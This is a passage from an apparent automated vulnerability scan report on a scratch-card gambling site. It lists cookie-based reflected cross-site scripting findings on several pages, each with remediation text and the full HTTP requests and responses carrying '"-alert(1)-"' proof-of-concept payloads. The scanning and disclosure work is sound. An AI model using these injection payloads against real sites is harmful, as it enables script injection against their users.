Date: Mon, 16 May 2011 12:30:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMaba62"-alert(1)-"4327c71e7a3; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53379


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMaba62"-alert(1)-"4327c71e7a3";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.416. http://www.scratchcardheaven.com/Promotions.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57bb5"-alert(1)-"30552f99443 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM57bb5"-alert(1)-"30552f99443; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: BO=FM57bb5"-alert(1)-"30552f99443; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47645


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM57bb5"-alert(1)-"30552f99443";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.417. http://www.scratchcardheaven.com/Promotions.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd2a"-alert(1)-"30ca785aaae was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMdfd2a"-alert(1)-"30ca785aaae; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMdfd2a"-alert(1)-"30ca785aaae; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:46 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:46 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:46 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47645


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMdfd2a"-alert(1)-"30ca785aaae";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.418. http://www.scratchcardheaven.com/Responsible.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82eb9"-alert(1)-"ecfe1c41134 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM82eb9"-alert(1)-"ecfe1c41134; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:15 GMT; path=/
Set-Cookie: BO=FM82eb9"-alert(1)-"ecfe1c41134; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:15 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:15 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:15 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM82eb9"-alert(1)-"ecfe1c41134";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.419. http://www.scratchcardheaven.com/Responsible.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b43be"-alert(1)-"ad71309d0a7 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMb43be"-alert(1)-"ad71309d0a7; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb43be"-alert(1)-"ad71309d0a7; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb43be"-alert(1)-"ad71309d0a7";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.420. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c7db"-alert(1)-"f514a857bcb was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM3c7db"-alert(1)-"f514a857bcb; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:09 GMT; path=/
Set-Cookie: BO=FM3c7db"-alert(1)-"f514a857bcb; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:09 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:09 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:09 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:09 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM3c7db"-alert(1)-"f514a857bcb";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.421. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f182d"-alert(1)-"6e6579ca1bd was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMf182d"-alert(1)-"6e6579ca1bd; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMf182d"-alert(1)-"6e6579ca1bd; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:58 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:58 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:58 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:58 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMf182d"-alert(1)-"6e6579ca1bd";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.422. http://www.scratchcardheaven.com/Terms.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90668"-alert(1)-"374c5063c2d was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM90668"-alert(1)-"374c5063c2d; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: BO=FM90668"-alert(1)-"374c5063c2d; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107749


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM90668"-alert(1)-"374c5063c2d";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.423. http://www.scratchcardheaven.com/Terms.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 798e6"-alert(1)-"79a9ef6c139 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM798e6"-alert(1)-"79a9ef6c139; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM798e6"-alert(1)-"79a9ef6c139; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:57 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:57 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:57 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107749


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM798e6"-alert(1)-"79a9ef6c139";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.424. http://www.scratchcardheaven.com/UnderAge.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5ddf"-alert(1)-"c8dcab5784e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMe5ddf"-alert(1)-"c8dcab5784e; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:12 GMT; path=/
Set-Cookie: BO=FMe5ddf"-alert(1)-"c8dcab5784e; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:12 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:12 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:12 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44075


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

